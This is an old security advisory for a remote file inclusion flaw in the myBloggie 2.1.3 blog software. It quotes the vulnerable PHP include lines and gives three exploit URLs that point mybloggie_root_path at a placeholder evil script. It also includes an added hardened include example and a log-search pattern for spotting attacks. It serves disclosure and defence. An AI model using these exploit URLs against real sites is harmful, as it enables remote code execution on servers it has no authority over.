myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

2006-08-11 00:00:00
vulners.com


myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion



Author : Sh3ll

Date : 2006/04/29

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous



Affected Software Description:


Application : myBloggie

version : 2.1.3

URL : http://www.mywebland.com , http://mybloggie.mywebland.com

Description :

myBloggie is considered one of the simplest, most user-friendly, yet feature-packed weblog systems available to date.

-----------------------------------------------------------------------------------------

Vulnerabilities:

~~~~~~~~~~~~~~~

In admin.php, index.php and db.php we found the following vulnerable code:

----------------------------------------admin.php----------------------------------------

....

<?php
include($mybloggie_root_path.'spacer6.php');
?>

...

----------------------------------------index.php----------------------------------------

....

<?php
}
if (!isset($mode)) {
    include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}
// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
    include($mybloggie_root_path.'searchform.php');
    include($mybloggie_root_path.'spacer.php');
}

...

-------------------------------------------db.php----------------------------------------

....

<?php
include($mybloggie_root_path .'includes/mysql.php');
?>

...

-----------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

Solution:

~~~~~~~~

Sanitize the variable $mybloggie_root_path in admin.php, index.php and db.php.
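As an added example (not code from myBloggie or from this advisory), the include pattern quoted above is shown next to a hardened form that fixes the root path relative to the script itself and allow-lists the modules it will include; the helper name, the allow-list contents and the php.ini settings named in the comments are assumptions for illustration.

```php
<?php
// Added example, not myBloggie's own code. Illustrates why the quoted
// include lines are exploitable and one way to harden them.

// --- Vulnerable pattern (as quoted in the advisory) ---
// With register_globals=On (the PHP 4 / early PHP 5 default), a request
// parameter named mybloggie_root_path creates $mybloggie_root_path before
// this line runs, so the include path is attacker-controlled. If remote
// URLs are allowed in include (allow_url_fopen / allow_url_include on),
// a script hosted elsewhere is fetched and executed on the server.
//
//   include($mybloggie_root_path.'spacer6.php');

// --- Hardened pattern ---
// 1. Never derive the root path from request data. Fix it relative to the
//    current file, as a constant, so no request parameter can override it.
define('MYBLOGGIE_ROOT_PATH', dirname(__FILE__) . '/');

// 2. Only include modules from a fixed allow-list, and verify the resolved
//    path still lies inside the application directory (rejects '..' and
//    remote URLs, since realpath() only resolves local files).
//    Helper name and allow-list contents are assumptions for this example.
function mybloggie_include_module($name)
{
    static $allowed = array('spacer6.php', 'blog.php', 'calendar.php',
                            'includes/mysql.php');
    if (!in_array($name, $allowed, true)) {
        trigger_error("refusing to include unknown module: $name", E_USER_ERROR);
        return false;
    }
    $root = realpath(MYBLOGGIE_ROOT_PATH);
    $path = realpath(MYBLOGGIE_ROOT_PATH . $name);
    // realpath() returns false for missing files, so a prefix check on the
    // canonical path is enough to reject anything outside the root.
    if ($path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        trigger_error("module outside application root: $name", E_USER_ERROR);
        return false;
    }
    return include $path;
}

// Usage at the include sites in admin.php / index.php / db.php:
mybloggie_include_module('spacer6.php');

// Defence in depth, in php.ini (assumed deployment settings):
//   register_globals = Off
//   allow_url_include = Off   (PHP >= 5.2)
```

Even with the code fix in place, a web-access-log search for requests carrying a `mybloggie_root_path=` parameter whose value starts with `http://` or `ftp://` is a cheap way to spot exploitation attempts against unpatched hosts.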

-----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams